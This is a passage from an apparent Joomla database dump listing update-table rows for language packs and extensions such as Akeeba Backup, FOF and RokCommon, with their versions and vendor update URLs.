ttps://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8005,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8006,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8007,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8008,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8009,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8010,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8011,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8012,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8013,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8014,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8015,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8016,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8017,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8018,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8019,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8020,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8021,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8022,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8023,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8024,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.1','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8025,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8026,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8027,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8028,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8029,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8030,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8031,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8032,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8033,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8034,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8035,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8036,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8037,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8038,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8039,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8040,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8041,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8042,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8043,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8044,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8045,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8046,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8047,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8048,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8049,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8050,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8051,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8052,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8053,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8054,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8055,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8056,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8057,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8058,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8059,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8060,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8061,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8062,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8063,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8064,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8065,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8066,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8067,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8068,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8069,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8070,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8071,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8072,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8073,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8074,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8075,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8076,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8077,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8078,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8079,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8080,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8081,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8082,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8083,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8084,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8085,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8086,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8087,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(8088,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(8089,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8090,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8091,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(8092,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(8093,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8094,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8095,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8096,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8097,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8098,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8099,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8100,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8101,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8102,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8103,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8104,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8105,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8106,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8107,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8108,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8109,3,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8110,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8111,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8112,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8113,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8114,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8115,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8116,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8117,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8118,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8119,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8120,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8121,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8122,3,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8123,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8124,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8125,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8126,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8127,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8128,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8129,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8130,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8131,3,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8132,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8133,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8134,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8135,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8136,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8137,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8138,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8139,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8140,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8141,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8142,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8143,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8144,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8145,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8146,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8147,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8148,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8149,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8150,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8151,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8152,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8153,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8154,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(8155,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(8156,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(8157,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(8158,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(8159,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(8160,20,0,'RokCommon','','pkg_rokcommon','package','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/559/1033ef39','',''),(8161,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(8162,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(8163,57,0,'French','','pkg_fr-FR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(8164,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(8165,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(8166,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(8167,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(8168,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(8169,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(8170,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(8171,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(8172,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(8173,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(8174,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(8175,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(8176,57,0,'Estonian','','pkg_et-EE','package','',0,'3.9.14.2','','https://update.joomla.org/language/details3/et-EE_details.xml','',''),(8177,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(8178,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(8179,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(8180,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(8181,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(8182,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(8183,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(8184,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(8185,57,0,'English US','','pkg_en-US','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(8186,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(8187,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(8188,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(8189,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(8190,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(8191,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(8192,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(8193,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(8194,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.13.2','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(8195,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(8196,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(8197,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(8198,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(8199,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(8200,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(8201,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(8202,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(8203,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(8204,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(8205,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.13.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(8206,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.12.2','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(8207,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(8208,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(8209,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(8210,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.5.0','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-5-0.html			\n		',''),(8211,1,0,'Joomla','','joomla','file','',0,'3.9.13','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(8212,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		